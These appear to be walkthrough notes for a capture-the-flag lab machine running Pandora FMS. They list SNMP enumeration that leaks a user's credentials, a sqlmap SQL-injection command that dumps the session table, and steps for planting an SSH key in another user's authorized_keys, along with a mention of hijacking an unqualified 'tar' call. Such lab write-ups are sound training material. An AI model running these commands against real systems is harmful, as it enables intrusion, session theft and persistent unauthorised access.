snmp-check returned many, so I first missed user & password and proceed with snmpwalk.
Finding a tiny info from vast output can be pain.
Replacing “tar” that has no full path was fun part.
00:17 feroxbuster
feroxbuster -u http://10.10.11.136 --force-recursion -C 404,405 -m GET,POST
00:31 UDP port scan
nmap -sU -v 10.10.11.136
00:39 SNMP enumeration
161 is SNMP here
sudo nmap -sU -A -PN -n -p 161 -script=snmp-sysdescr 10.10.11.136
onesixtyone 10.10.11.136 -c /usr/share/doc/onesixtyone/dict.txt
snmp-check -p 161 10.10.11.136
somehow also tried snmpbulkwalk.
I decided to not use -Cr option, as timeout happens when set it greater than default value(10).
This may be my local machine spec issue.
-t is for timeout sec.
snmpbulkwalk -Cr10 -c public -t 20 -v2c 10.10.11.136 . > snmpbulkwalk
01:31 ssh tunnel
ssh -L 80:localhost:80 daniel@10.10.11.136
01:47 Pandora FMS 742: Critical Code Vulnerabilities
Here, vulnerability is well explained.
And why SQL below reveals session ids.
sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
Adding your own pub key, so you can ssh
- prepare new key pair for this purpose only
ssh-keygen -f pandora.key
then we have pandora.key & pandora.key.pub
2. mkdir .ssh below matt’s home directory, add authorized_keys file.
mkdir .ssh
chmod 700 .ssh
touch authorized_keys
chmod 600 authorized_keys
3. Copy&Paste pandora.key.pub to authorized_keys
Echo ****pub key*** > authorized_keys
4. login
ssh -i pandora.key matt@10.10.11.136